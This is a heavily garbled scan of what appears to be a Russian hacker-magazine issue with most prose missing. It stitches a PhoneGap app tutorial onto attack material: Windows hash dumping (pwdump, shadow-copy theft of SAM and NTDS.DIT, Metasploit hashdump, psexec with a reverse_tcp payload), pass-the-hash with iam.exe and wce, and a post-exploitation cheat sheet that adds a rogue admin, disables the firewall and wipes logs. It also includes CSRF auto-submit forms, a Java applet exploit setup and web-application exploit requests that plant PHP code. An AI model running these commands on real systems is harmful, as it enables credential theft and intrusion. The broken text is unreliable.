        <a href="#points" class="ui-btn-right" id="menu-points" data-transition="pop"></a>
    </div>
    <div data-role="content">
        <div id="map-canvas">
            <!-- -->
        </div>
    </div>
</div>

data-dom-cache="true" ,
.
data-transition="pop",
. ,
jQuery Mobile, (bit.ly/vtXX3M).

PHONEGAP
,
PhoneGap
. !
.
PhoneGap Build (build.phonegap.com) .


. ,
, .
-
PhoneGap,
. (github.com/phonegap/phonegap-plugins),
iPhone, Android, Palm, BlackBerry. iOS
20 : BarcodeScanner ( -), AdPlugin ( iAd), NativeControls ( iOS
) .


PC ZONE
:

<div data-role="page" data-dom-cache="true" class="page-pints" id="points">
    <div data-role="header">
        <!-- -->
        <a href="#" data-theme="b" data-icon="delete" id="delete-all"> </a>
        <h1></h1>
        <!-- -->
        <a href="#index" class="ui-btn-right" data-transition="pop" data-direction="reverse">
        </a>
    </div>
    <div>
        <!-- -->
        <ul id="list" data-role="listview" data-inset="true" data-split-icon="delete">
        </ul>
    </div>
</div>

data-transition=pop,
data-direction=reverse,
.
. , .


,
API Google Maps, :
var latLng = new gm.LatLng(this.options.lat, this.options.lng);
this.map = new gm.Map(element, {
    zoom: this.options.zoom,          // initial zoom level
    center: latLng,                   // initial map center
    mapTypeId: gm.MapTypeId.ROADMAP,  // standard road map
    disableDoubleClickZoom: true,     // no zoom on double click/tap
    disableDefaultUI: true            // hide the default map controls
});

Gm , Google
Maps.
. :
this.person = new gm.Marker({
map: this.map,
icon: new gm.MarkerImage(PERSON_SPRITE_URL,
new gm.Size(48, 48))
});

PERSON_SPRITE_URL
Google-. maps.gstatic.com/mapfiles/cb/mod_cb_scout/cb_scout_sprite_api_003.png. , , ,
, click:
gm.event.addListener(this.map, 'click', function (event) {
    self.requestMessage(function (err, message) {
        // on error, do not add a point
        if (err) return;
        // add a point at the clicked position with the entered message
        self.addPoint(event.latLng, self.options.radius, message);
        self.updatePointsList(); // refresh the list of points
    });
}, false);

ExternalHosts

.
. Geolocation API
(, ):
if (navigator.geolocation) {
    // Success callback: read the coordinates and move the person marker
    function gpsSuccess(pos) {
        var lat, lng;
        if (pos.coords) {
            lat = pos.coords.latitude;
            lng = pos.coords.longitude;
        } else {
            lat = pos.latitude;
            lng = pos.longitude;
        }
        self.movePerson(new gm.LatLng(lat, lng));
    }
    // Poll the current position every 3 seconds
    window.setInterval(function () {
        navigator.geolocation.getCurrentPosition(gpsSuccess, $.noop, {
            enableHighAccuracy: true,
            maximumAge: 300000
        });
    }, 3000);
}

movePerson
getPointsInBounds() ,
- .
? HTML5
localStorage, (
,
). , , , !

-
,
.
- Safari Chrome.
,
.
, , ,
WebKit.
- -


PhoneGap: HTML5

. , , Run
iPhone/iPad
PhoneGap.
, index.html , . ,
,
www. , Create folder
references for any added folders.
, . www.
PhoneGap.


phonegap-1.2.0.js . PhoneGap . . Supporting Files/PhoneGap.plist, ExternalHosts ,
( Google
Maps): *.gstatic.com, *.googleapis.com, maps.google.com.
,
. - DOMReady jQuery:
$(document).ready(). PhoneGap deviceready,
, . :

iOS

. - ( Denwer
XAMPP), ,
.
, . ,
, PhoneGap, ,
, . ,
iOS-. ,
PhoneGap IDE
.

iOS,
Mac OS 10.6+ (
Mac OS 10.6), Xcode
iOS SDK. SDK,
Apple , Xcode iOS SDK (developer.apple.com/devcenter/ios/index.action). ,
4 . ,
Apple (
AppStore,
). iOS Objective-C. PhoneGap, PhoneGap iOS.
(https://github.com/callback/phonegap/zipball/1.2.0),
iOS . , Xcode PhoneGap.
,
IDE -


document.addEventListener("deviceready", function () {
    new Notificator($("#map-canvas")[0]);
    // Warn the user when the device has no network connection
    if (navigator.network.connection.type === Connection.NONE) {
        navigator.notification.alert(" -", $.noop, TITLE);
    }
}, false);

, -. , . navigator.notification.alert
alert, , .
, network.
connection (bit.ly/uEyRwz) (bit.ly/tkvzE2).
:
document.addEventListener("touchmove", function (event) {
event.preventDefault();
}, false);

alert confirm ,
PhoneGap:
navigator.notification.confirm(' ?', function (button_id) {
    if (button_id === 1) { // OK
        self.removePoint(point);
    }
}, TITLE);

UI-
jQuery Mobile , ,
. PhoneGap
,
(phonegap.com/tools): Sencha Touch, Impact, Dojo Mobile, Zepto.js .

, , , .
, ( ,
) ,
PhoneGap:
navigator.geolocation.watchPosition(function (position) {
    self.movePerson(new gm.LatLng(
        position.coords.latitude,
        position.coords.longitude));
}, function (error) {
    navigator.notification.alert(
        'code: ' + error.code + '\nmessage: ' + error.message,
        $.noop,
        TITLE
    );
}, {
    frequency: 3000
});


, . Run ,
iOS-!
.


iPhone, iPod iPad , Xcode. .
:). :


PhoneGap, ,

. .
Appcelerator Titanium (www.appcelerator.com).
Titanium
Android iPhone, BlackBerry.
,
IDE. Titanium ,
( $49 ).
$120 . Appcelerator Titanium
, 25
.
Apache 2.
Corona SDK (www.anscamobile.com/corona).
iOS Android. . ,

OpenGL. , -
: $199 $349
iOS Android. Corona IDE .
Corona , JavaScript.


PhoneGap-

iOS, iOS ( , iOS Developer


Program). Apple,
(Android, Windows Phone) . ,
, - . $99
. Apple ,
.
iOS App Store.
, $99 ,
.
iOS-
( ,
: bit.ly/tD6xAf). ,

. .
?

-
iOS
PhoneGap. Objective-C,
,
API PhoneGap. , Android Windows
Mobile 7, , -
, (
: phonegap.com/start). ,
PhoneGap,
(phonegap.com/apps). PhoneGap
.
, ,
.
, HTML+JS -
, . , PhoneGap
Nitobi
( GitHub: github.com/phonegap). ,
Nitobi Adobe.
, ? z


PC ZONE

Ant (a.zhukov@real.xakep.ru)

WINDOWS-



WINDOWS-

, ,
,



,
NTLM.
.
.

?
, .
:
SAM-, LM/NTLM-
;
LSA, LM/NTLM- , ;
, MSCache-
, ( , ,
).
, AD-.
:
! , ,
. 7
.

PWDUMP
FGDUMP

,
. NTLM/LM-
.
, DLL-
SeDebugPrivilege. ,
( NT AUTHORITY\SYSTEM).
, :
,
( LiveCD), , Kon-Boot (www.piotrbania.com/all/kon-boot),
. ( NT AUTHORITY\
SYSTEM ),
EasyHack .
.
pwdump (www.foofus.net/~fizzgig/pwdump) fgdump (www.foofus.net/~fizzgig/fgdump).
, . :
pwdump localhost
fgdump.exe


. 127.0.0.1.PWDUMP
( ) 127.0.0.1.CACHEDUMP
( ).


Windows-

,
, . , , pwdump, :
> pwdump -o mytarget.log -u MYDOMAIN\someuser -p \
'lamepassword' 10.1.1.1

10.1.1.1 , MYDOMAIN\
someuser , lamepassword , mytarget.log .
pwdump, fgdump ,
:

pwdump

> fgdump.exe -f hostfile.txt -u MYDOMAIN\someuser -T 10

hostfile.txt , , -T
10 .
,
( ).
, fgdump.exe.


VOLUME SHADOW COPY SERVICE

pwdump fgdump , , ,
. , .
,
SAM, , . ,
, SYSTEM.
,
, - . - ,
, ,
. , ,
, . , ,
Volume Shadow Copy Service ( ).
Windows XP Server 2003.
, , System
State ntbackup
(Volume Shadow Copy for Shared Folders).
,
( , SAM SYSTEM),
.



, Windows
, , .
,
. ,
, . HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\cachedlogonscount 0.
, .
.


Windows
Credentials Editor (WCE)

, vssown.vbs
(tools.lanmaster53.com/vssown.vbs), .
.
: cscript vssown.vbs /start.
: cscript vssown.vbs /create.
: cscript vssown.vbs /list.
. Device object \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14 ( 14
). .
1. :
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\windows\system32\config\SAM .

2. , -
SAMInside (insidepro.com/rus/saminside.shtml)
.

, ,
,
! ,
. ,
SAM SYSTEM. Active Directory NTDS.DIT, :
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy14\windows\ntds\ntds.dit .

, SYSTEM. ,
? SYSTEM NTDS.DIT,
?
, , NTDS.DIT , .
Csaba Barta ,
NTDS.DIT .
csababarta.com/downloads/ntds_dump_hash.zip. , .
BackTrack5 ( Linux-),
. ,
. libesedb:
cd libesedb
chmod +x configure
./configure && make

SAMInside

:
.
, :
cd esedbtools
./esedbdumphash ../../ntds.dit

/libesedb/esedbtools/ntds.dit.export/datatable.
. , SYSTEM:
cd ../../creddump/
python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable

! !
, ( ).
, : python ./dsdumphistory.py ../system ../libesedb/esedbtools/ntds.dit.export/datatable.
, ,
( ).

HASHGRAB2 +
SAMDUMP2

, .
, ,
LiveCD (,
Offline NT Password & Registry Editor),
,
. HashGrab2 (py1337.get-root.com/tools/hashgrab2.zip) samdump2 (sourceforge.net/projects/ophcrack/files/samdump2/2.0.1),
LiveCD-. HashGrab2
Windows-, , samdump2
SAM SYSTEM.

> sudo ./hashgrab2.py


HashGrab v2.0 by s3my0n
http://InterN0T.net
Contact: RuSH4ck3R[at]gmail[dot]com
[*] Mounted /dev/sda1 to /mnt/jomAT8
[*] Mounted /dev/sdb1 to /mnt/AZwJUs
[*] Copying SAM and SYSTEM files...
[*] Unmounting partitions...
[*] Deleting mount directories...
[*] Deleting ['./jomAT8']
>$ ls
hashgrab2.py jomAT8.txt
>$ cat ./jomAT8.txt
Administrator:HASH
Guest:501:HASH
s3my0n:1000:HASH
HomeGroupUser$:1002:HASH

METASPLOIT

, .
Meterpreter.
Metasploit Framework
. :
meterpreter > run post/windows/gather/hashdump

.
. Metasploit ,
. PsExec:
meterpreter > use exploit/windows/smb/psexec


SAMInside

insidepro.com/rus/saminside.shtml

,
NTLM-.
.
, .
,
Windows
.


lm2ntcrack

ighashgpu

www.xmco.fr/lm2ntcrack/index.html

www.golubev.com/hashgpu.htm

,
. NT, LM- .
, LM- ,
NT
. ,
, LM- ADMINISTRAT0R,
, , ,
lm2ntcrack.


. , - , .
ighashgpu
GPU MD4, MD5, SHA1, NTLM,
Oracle 11g, MySQL5, MSSQL. ,
.


Windows-

meterpreter > set payload windows/meterpreter/reverse_tcp
meterpreter > set rhost [ ]
meterpreter > set smbpass [ ]
meterpreter > set smbuser [ ]
meterpreter > set lhost [ ]
meterpreter > exploit
meterpreter > shell

, , . ,
. ,
getsystem. , MS09-012, MS10-015 (KiTrap0D) .

PASS-THE-HASH

NTLM .
,
.
:). , Pass The Hash,
1997 .
Pass-the-Hash Toolkit. (oss.coresecurity.com/projects/pshtoolkit.html): IAM.EXE, WHOSTHERE.EXE
GENHASH.EXE. , GENHASH
LM- NT- . WHOSTHERE.EXE, -, .
, :
, / NTLM- . IAM.EXE
- ,
(, , . .),
,
,
.
,
NTLM-,
, .
:
whosthere.exe
;
iam.exe -h administrator:mydomain:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
.

, , ,
.

CUDA-Multiforcer

Cain&Abel NTLM
( )

WINDOWS
CREDENTIALS EDITOR

WCE Pass-the-Hash Toolkit,


.
. ,
( NTLM/LM- ):
wce.exe -l


. ,
- - :
wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>.

:
wce.exe -s user:Victim:1F27ACDE849935B0AAD3B435B51404EE:579110C49145015C47ECD267657D3174 -c "c:\Program Files\Internet Explorer\iexplore.exe"

-s user Victim, LM- NTLM-, - , .


, . :)

, , . .
, (, )
, . z

ophcrack

ophcrack.sourceforge.net

John the Ripper

www.cryptohaze.com/multiforcer.php

, .
,
nVidia. : MD5, NTLM, MD4, SHA1,
MSSQL, SHA, MD5_PS: md5($pass.$salt), MD5_SP:
md5($salt.$pass), SSHA: base64(sha1($pass.$salt)),
DOUBLEMD5: md5(md5($pass)), TRIPLEMD5, LM:
Microsoft LanMan hash .

Windows
rainbow-.
.
, , .
rainbow-. ,
,
.

NTLM-,

-. jumbo,
, NTLM.
diff',
, ( win32).


www.openwall.com


WINDOWS-?
. , , Windows-,
? . ,
? -,
.

. , ,
( nmap, - ),
.

ipconfig /all

ipconfig /displaydns

DNS-.

netstat -nabo

TCP/UDP-. -b ,
, .

netstat -s -p [tcp|udp|icmp|ip]

netstat - (TCP, UDP, ICMP, IP).

netstat -r
route print

.
.

netstat -na | findstr :445

, , 445.

net view

SMB ().

net user %USERNAME% /domain

( '/domain',
). , ,
, . .

net accounts

( ).

net accounts /domain

net localgroup administrators

net localgroup administrators /domain

net config workstation

, NetBIOS, , , , . .

net share

SMB-.

arp -a

ARP- .

type %WINDIR%\System32\drivers\etc\hosts

hosts.


.
: ( ), ,
, , . .

whoami

? .
'/all' SID , SID , (
?).

whoami /all
qwinsta

, , - . RDP- (
), .

ver

( uname ), , .

set

. SET ,
. USERDOMAIN, USERNAME, USERPROFILE, HOMEPATH, LOGONSERVER, COMPUTERNAME, APPDATA, ALLUSERPROFILE. .

systeminfo (XP+)

, , ,
, , .

qprocess *

, .
, ID , PID .

qappsrv

, .

schtasks /query /fo csv /v >


%TEMP%

csv, .

at

, , ,
. , SYSTEM ( Win7x64). , , BAT- do_something.bat
SYSTEM 15:41, :
at 15:41 /interactive "d:\pentest\do_something.bat"
, .

schtasks (XP+)

, . at,
schtasks ( ).

net start sc query

sc getkeyname "XXXXX"
sc queryex "XXXXX"

key name .
, PID .

tasklist (XP+)

taskkill [/f] /pid <pid>


taskkill [/f] /im <image_name>

PID

fsutil fsinfo drives

( ).

gpresult /z

- .

. , . ,
.

wevtutil el

, (, . .).

wevtutil qe <LogName>

wevtutil cl <LogName>

del %WINDIR%\*.log /a /s /q /f

WINDOWS.


Windows - . -
- .

%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /get-features

, ,
Windows Vista SP1/7/2008/2008R2, , telnet ftp-..

%windir%\System32\cmd.exe /c "%SystemRoot%\system32\Dism.exe" /online /enable-feature /featurename:TFTP

TFTP. FTP- tftp.exe


.

Ntsd -server tcp:port=1337 cal.exe


Ntsd -remote tcp:server=<ip>,port=1337

Windows Vista ntsd.exe,


system32. .
( ), - .
( ). .shell,
. NTSD Backdoor.

net use

,
. :
, , , (, ).

reg save HKLM\Security security.hive

security . , , system.

reg save HKLM\SAM sam.hive

SAM, .

reg add [\\TargetIPaddr\] [RegDomain][ \Key ]

( TargetIPaddr).
, REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead (: Data,
: REG_BINARY, : fe340ead).

reg export [RegDomain]\[Key] [FileName]

reg import [FileName ]

reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!]

, , .
, , C: sam_backup.dat?
, , , .
:

tree C:\ /f /a > C:\output_of_tree.txt

C: , .

dir \ /s /b | find /I "search_string"

dir (\) (/s)


base (/b) search_string, .


WMIC

, ,
WMI (Windows Management Interface).
, WMI- (WMIC): , , .

wmic baseboard get Manufacturer, Model, Product, SerialNumber, Version

WMI
. , WMI- (computersystem, bios, ,
, baseboard) .
. .

wmic nicconfig get caption, macaddress, ipaddress, DefaultIPGateway

: , MAC-, IP-,
.

wmic nicconfig where "IPEnabled = 'TRUE' and DNSDomain IS NOT NULL" get DefaultIPGateway, DHCPServer, DNSDomain, DNSHostName, DNSServerSearchOrder, IPAddress, IPSubnet, MACAddress, WINSEnableLMHostsLookup, WINSPrimaryServer, WINSSecondaryServer /format:list

wmic printer get Caption, Default, Direct, Description, Local, Shared, Sharename, Status

, .

wmic os get bootdevice, caption, csname, currenttimezone, installdate, servicepackmajorversion, servicepackminorversion, systemdrive, version, windowsdirectory /format:list

wmic product get Caption, InstallDate, Vendor

wmic path win32_product where "name = 'HP Software Update'" call Uninstall

HP Software Update.


, .
.

net user hacker hacker /add

hacker .

net localgroup administrators /add hacker


net localgroup administrators hacker /add

hacker .

net share nothing$=C:\ /grant:hacker,FULL /unlimited

C: hacker .

net user username /active:yes /domain

- ( , ),
.

netsh firewall set opmode disable

Windows.

wmic product get name /value


wmic product where name="XXX" call uninstall /nointeractive

,
(, ).

rundll32.exe user32.dll, LockWorkStation

() .


/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK
MITM RDP

-
. ,
. , ,
,
. ?
RDP,
.
.
:
,
Windows, XP 2000 ( ). ,
,
TLS. , , . 6- man-in-the-middle (MiTM),
,
, . , XP
,
. ,
RDP.
MiTM , , , , , , :).
MiTM RDP 6- :
0) ARP- DNS-. , .
1) .
2)
salt'. .
3) , .
4)
.


5) (
RC4).
, MiTM-. ,

. , MD5- ,
(. . ), .
,
.
, .
(goo.gl/7yADy). RDP MiTM, . - Cain&Abel (www.oxid.it):
Sniffer Scan MAC address.
ARP ARP .
.
: ,
, .
5) arp-poisoning.

1)
2)
3)
4)

. MiTM- ARP-RDP RDP-.


, , , 6 . ?
,
. ,
. , , - Irongeek (goo.gl/Embxs).
RDP-,
, . (goo.gl/pydMZ). ,
, 2003 RPD 5.0.


JAVA

, Java, , . , Java
, Flash, ,
. ?
, Java , . javatester.org/version.html .
,

. ? ,
-
CVE-2010-4452, . , Metasploit':

,
Java-.
, , ,

. ? ! :)
JavaScript,
Java-,
. , ,
(defcon-russia.ru/wall.txt).
SET (Social Engineer Toolkit).
BackTrack 5
(www.social-engineer.org). SET
, .
SET :

1) :
use exploit/windows/browser/java_codebase_trust
2) :
set URIPATH test.php
set LPORT 80
3) :
set payload java/meterpreter/reverse_tcp
4) :
exploit

1) Website Attack Vectors;


2) The Java Applet Attack Method;
3) Web Templates (
Site Cloner );
4) Gmail Gmail;
4) Import your own executable, exe.

Meterpreter :). , Java ?


. : -

exe-. ,
, Java.

, ? ?
? ? :) ,
, , , . ,
( :)),
. , - ,
. :
SMTP (25/TCP)
, Gmail Mail.ru.
, , , , ,
, -
. ?
150 . ,
IP.
3proxy (www.3proxy.ru), ,
. 3APA3A. , security.nnov.ru
,
, ,
. :)
( *), (
)
:

- .
,
. - 3proxy. ,
?
( ).
, , -
( www.example.com:25). ,
. , nmap
.
, UDP ICMP, TCP, TCP-ACK. ,
.

proxy p25


REVERSE-

, reverse. ? ,
-, () -
. ? . ,
reverse-
-, WAF
SSL-, , (,
). .
,
(,
- ?). .
reverse-
. ?

-. . , X-Forwarded-For,
, ! , HTTP
, .
(goo.gl/V0beW). HTTP,
RFC 2616 1.1, ,
Max Forwards. , , TRACE OPTIONS.
-
.

HTTP-traceroute. Squid
reverse- Wikipedia.org

,
, ,
. , GET POST,
. , TTL IP-.
,
- ,
HTTP- traceroute. , TRACE-
-,
RFC, GET
MaxForwards. traceroute,
, IP- .
:
HTTP-Traceroute.py -t www.victim.com
GET/POST)

- CSRF

, CSRF (Cross Site Request Forgery,


). ,
-. ,
,
(, ),
(,
). , , ,
,
. ,
, JavaScript. ,
- -
. .
GET- : http://server.com/change_password.php?NP=new_pass, new_pass
, . ,
HTML' :
<iframe src="http://server.com/change_password.php?NP=new_pass"></iframe>


reverse proxy

-m (TRACE/

. GET- . ,
POST?
:
<form name="passwd" action="http://server.com/change_password.php" method="post">
<input type="hidden" name="NP" value="new_pass">
<input type="submit">
</form>
<script>document.passwd.submit();</script>

! XML? XML-. :)
<form name=passwd ENCTYPE="text/plain"
action="http://server.com/change_password.php"
METHOD="POST">
<input type=hidden name='<?xml version'
value='"1.0"?><User><Password>new_pass</Password></User>'>
</form>
<script>document.passwd.submit();</script>

, , . ;).


(, , digital
forensics) ,
.
,
, .
, :
;
;
;
DLL- ;
;
;
;
Virtual Address Descriptor;
;
..
, , , ,
.
Volatility (goo.gl/Hi5ip). Python'
Windows ( XP), , 32-. , ,
. ,
.
(
), ,
. ,
, MoonSols DumpIt (http://goo.gl/BY1QN).
- :
. . , ,
( ,
USB).
, ? Volatility.
, Python', standalone-, .
, :
volatility.exe imageinfo -f d:\test.raw

:
imageinfo ;
-f d:\test.raw .
Volatility - . ;)
(WinXPSP3x86),
. , ?

:
volatility pslist -f d:\test.raw --profile=WinXPSP3x86

, , :
volatility netscan -f d:\test.raw --profile=WinXPSP3x86

- , ,
, SAM, -
LSA?
Windows .
volatility hivelist -f d:\test.raw --profile=WinXPSP3x86

hivelist ,
.
,
:
volatility hashdump -f d:\test.raw --profile=WinXPSP3x86 -y 0xe1035b60 -s 0xe1805b60

:
hashdump ;
-y 0xe1035b60 System;
-s 0xe1805b60 SAM.


, . ,
. ,
, . Volatility.
,
, .


(ivinside.blogspot.com)
(115612, . , .1)



. ,

, ,

, ,
.

Microsoft Office 2007


Excel .xlb

CVSSV2

9.3
(AV:N/AC:M/Au:N/C:C/I:C/A:C)

BRIEF

: 5 2011 .
: Aniway, abysssec, sinn3r, juan vazquez.
CVE: CVE-2011-0105.
,
xlb Excel.
.
EXPLOIT

Excel ,
(, ).
xlb.


ajax_save_name.php

BIFF8.
,
. BIFF-
:
BOF Type = workbook globals
Workbook globals
...
EOF
BOF Type = worksheet
Sheet records
EOF
BOF Type = worksheet
Sheet records
EOF
...

ID ( )
, sz ( )
(sz )

(ID ) . .
: BOF (Begin Of File) EOF (End Of File).
BOF, :

0809H
0010H
0600H
****H

BOF-:
0005H Workbook globals
0006H Visual Basic module
0010H Worksheet
0020H Chart
0040H BIFF4 Macro sheet
0100H BIFF4 Workbook globals

BOF 0xA7.
,
0x3C.
sub_30199E55.
. .
, ,
,
.

BOF, BIFF8
.

2
2
00
2
02
2
04
2
06
2
08
4
12
4

ID

ID


Excel,

.text:3053F830 call sub_301A0A01
.text:3053F835 cmp eax, 3Ch
.text:3053F838 mov [ebp+var_ED4], eax
.text:3053F83E jnz loc_30540488
.text:3053F844 call sub_301A0A01
.text:3053F849 mov ecx, [ebp+var_EDC]
.text:3053F84F imul ecx, [ebp+var_F00]
.text:3053F856 mov edi, eax
.text:3053F858 mov eax, [ebp+var_EE0]
.text:3053F85E lea ebx, [ecx+eax+3]
.text:3053F862 call sub_301A0ABE
.text:3053F867 push 0FFFFFFFDh
.text:3053F869 pop edx
.text:3053F86A sub edx, ecx
.text:3053F86C add eax, edx
.text:3053F86E push eax ; Dst
.text:3053F86F push ebx ; int
.text:3053F870 mov eax, edi
.text:3053F872 call sub_30199E55

, sub_30199E55 ,
. ,
.


CheckFile()

.text:30199E60 cmp edi, [esp+4+Dst]
.text:30199E64 ja loc_303EE1B7
.text:30199E6A mov ecx, [esp+4+arg_0]
.text:30199E6E push ebx
.text:30199E6F mov ebx, dword_30F726C0
.text:30199E75 push ebp
.text:30199E76 mov ebp, nNumberOfBytesToRead
.text:30199E7C push esi
.text:30199E7D mov [esp+10h+Dst], ecx
...
.text:30199E93 mov eax, [esp+10h+Dst]
.text:30199E97 push esi ; Size
.text:30199E98 lea edx, dword_30F6E6B8[ebx]
.text:30199E9E push edx ; Src
.text:30199E9F push eax ; Dst
.text:30199EA0 sub edi, esi
.text:30199EA2 call memcpy
.text:30199EA7 add [esp+1Ch+Dst], esi
.text:30199EAB add ebx, esi
.text:30199EAD add esp, 0Ch
.text:30199EB0 test edi, edi
.text:30199EB2 mov dword_30F726C0, ebx
.text:30199EB8 jnz loc_301E0DB3

PE-.
, .
, .
memcpy,
, /GS. ,
esp . ,
call esp.
TARGETS

Microsoft Office Excel 2007/Microsoft Office Excel 2007 SP2.


SOLUTION

, .

MS11-077 Win32k Null Pointer De-reference


Vulnerability POC

CVSSV2

7.2
(AV:L/AC:L/Au:N/C:C/I:C/A:C)

BRIEF

,
. ,
/GS /SAFESEH. , /GS
MS Visual Studio, , .
,
,
.
cookie,
.
64-
, ,
cookie. , ,
. . /SAFESEH
SEH- .
,
,
. ,
. Visual Studio
/SAFESEH


: 23 2011 .
: KiDebug.
CVE: CVE-2011-1985.
win32k.sys , . .
EXPLOIT

:
.text:BF9140C0 ; __stdcall NtUserfnINCBOXSTRING(x,x,x,x,x,x,x)
.text:BF9140C0 _NtUserfnINCBOXSTRING@28 proc near ; CODE XREF: xxxDefWindowProc(x,x,x,x)+6E|p
.text:BF9140C0                                    ; NtUserMessageCall(x,x,x,x,x,x,x)+61|p ...
.text:BF9140C0
.text:BF9140C0 HWND   = dword ptr 8
.text:BF9140C0 arg_4  = dword ptr 0Ch
.text:BF9140C0 arg_8  = dword ptr 10h
.text:BF9140C0 arg_C  = dword ptr 14h
.text:BF9140C0 arg_10 = dword ptr 18h
.text:BF9140C0 arg_14 = dword ptr 1Ch
.text:BF9140C0 arg_18 = dword ptr 20h


,
BSoD:

.text:BF9140C0
.text:BF9140C0 mov edi, edi
.text:BF9140C2 push ebp
.text:BF9140C3 mov ebp, esp
.text:BF9140C5 mov ecx, [ebp+HWND] ; HWND == 0xffffffff (-1),
.text:BF9140C8 mov eax, [ecx+20h] ; BSOD
...

NtUserMessageCall NtUserfnINCBOXSTRING
, CB_ADDSTRING:
.text:BF80EE6B ; int __stdcall NtUserMessageCall(int, int, int UnicodeString, PVOID Address, int, int, int)
...
.text:BF80EEB1 push [ebp+arg_18] ; int
.text:BF80EEB4 movzx eax, ds:_MessageTable[eax]
.text:BF80EEBB push ecx ; int
.text:BF80EEBC push [ebp+arg_10] ; int
.text:BF80EEBF and eax, 3Fh
.text:BF80EEC2 push [ebp+Address] ; Address
.text:BF80EEC5 push [ebp+UnicodeString] ; int
.text:BF80EEC8 push [ebp+arg_4] ; int
.text:BF80EECB push esi ; int
.text:BF80EECC call ds:_gapfnMessageCall[eax*4] ; NtUserfnINSTRINGNULL(x,x,x,x,x,x,x)
...
.rdata:BF990D68 _gapfnMessageCall dd offset _NtUserfnNCDESTROY@28 ; DATA XREF: NtUserMessageCall(x,x,x,x,x,x,x)
.rdata:BF990D68 ; NtUserfnNCDESTROY(x,x,x,x,x,x,x)
.rdata:BF990D6C dd offset _NtUserfnNCDESTROY@28 ; NtUserfnNCDESTROY(x,x,x,x,x,x,x)
.rdata:BF990D70 dd offset _NtUserfnINLPCREATESTRUCT@28 ; NtUserfnINLPCREATESTRUCT(x,x,x,x,x,x,x)
...
.rdata:BF990DD4 dd offset _NtUserfnINCBOXSTRING@28 ; NtUserfnINCBOXSTRING(x,x,x,x,x,x,x)
...

,
SendMessageCallback((HWND)-1,CB_ADDSTRING,0,0,0,0);

SendNotifyMessage((HWND)-1,CB_ADDSTRING,0,0);


CB_ADDSTRING          0x0143
CB_INSERTSTRING       0x014A
CB_FINDSTRING         0x014C
CB_SELECTSTRING       0x014D
CB_FINDSTRINGEXACT    0x0158
LB_ADDSTRING          0x0180
LB_INSERTSTRING       0x0181
LB_SELECTSTRING       0x018C
LB_FINDSTRING         0x018F
LB_FINDSTRINGEXACT    0x01A2
LB_INSERTSTRINGUPPER  0x01AA
LB_INSERTSTRINGLOWER  0x01AB
LB_ADDSTRINGUPPER     0x01AC
LB_ADDSTRINGLOWER     0x01AD

TARGETS

Windows XP SP3/XP SP2 x64, Windows 2003 Server SP2 (+ itanium,x64),


Windows Vista SP2/SP2 x64, Windows Server 2008 SP2 x32/x64/
itanium, Windows 7 x32/x64, Windows 7 SP1 x32/x64, Windows Server
2008 r2 x64/itanium, r2 sp1 x64/itanium.
SOLUTION

MS11-077, .

Wordpress
Zingiri Web Shop Plugin

CVSSV2

7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)

BRIEF

WordPress
. , ,
.
-,

,
.
Egidio Romano aka EgiX . EgiX
13 , ,
.
EXPLOIT

/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php, 3756
.
$selectedDocuments POST- value.
$selectedDocuments
displayArray() writeInfo(), , $selectedDocuments. writeInfo(), /fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php:
function writeInfo($data, $die = false)
{
    $fp = @fopen(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'data.php', 'w+');
    @fwrite($fp, $data);
    @fwrite($fp, "\n\n" . date('d/M/Y H:i:s') );
    @fclose($fp);
    ...

if ($_POST['templateName']) {
    $dir = '../../../../content/editor_templates/'.$_SESSION['s_login'];
    if (!is_dir($dir) && !mkdir($dir, 0755)) {
        throw new Exception(_COULDNOTCREATEDIRECTORY);
    }
    $filename = $dir.'/'.$_POST['templateName'].'.html';
    $templateContent = $_POST['templateContent'];
    if(file_exists($filename) === false) {
        $ok = file_put_contents($filename, $templateContent);
        chmod($filename, 0644);

GetUserTimeTarget()

! data.php,

-.
exploit-db.com (EDB-ID: 18111). PHP,
PHP.
,
, :
// Arch Linux
# pacman -S php
// Debian-based
# apt-get install php

:
$ php 18111.php <host> <path>

<host> , <path> WordPress.


, Joomla!, -
CONFIG_SYS_ROOT_PATH.

SOLUTION

2.2.4 .

2. . checkFile(), /libraries/filesystem.class.php, 31433154
. FileSystemTree::uploadFile(),
, checkFile() . , ,
file_black_list,
php, php3, jsp, asp, cgi, pl, exe, com,
bat.
php.

eFront

CVSSV2

7.5
(AV:N/AC:L/Au:N/C:P/I:P/A:P)

BRIEF

EgiX

eFront.
,
, .
EXPLOIT

1. .
/www/editor/tiny_mce/plugins/save_template/save_template.php
( 818):


POST /efront/www/editor/tiny_mce/plugins/save_template/save_template.php HTTP/1.1
Host: localhost
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

templateName=sh.php%00&templateContent=<?php evil_code(); ?>

3. SQL- UPDATE.
getUserTimeTarget(), /libraries/tools.php: .
, package_ID,
$entity. , /www/periodic_updater.php:

TARGETS

Wordpress Zingiri Web Shop Plugin 0.9.12 2.2.3.

, file_put_contents() $_POST['templateName'] $_POST['templateContent'], . ,
, ,
php,
magic_quotes_gpc. ,
, :

if ($_SESSION['s_login']) {
$entity = getUserTimeTarget($_GET['HTTP_REFERER']);
//$entity = $_SESSION['s_time_target'];
//Update times for this entity
$result = eF_executeNew("update user_times set time=time+("
.time().
"-timestamp_now),timestamp_now="
.time().
"where session_expired = 0 and session_custom_identifier = '".
$_SESSION['s_custom_identifier'].
"' and users_LOGIN = '".
$_SESSION['s_login'].
"' and entity = '".
current($entity).
"'and entity_id = '".
key($entity).
"'");


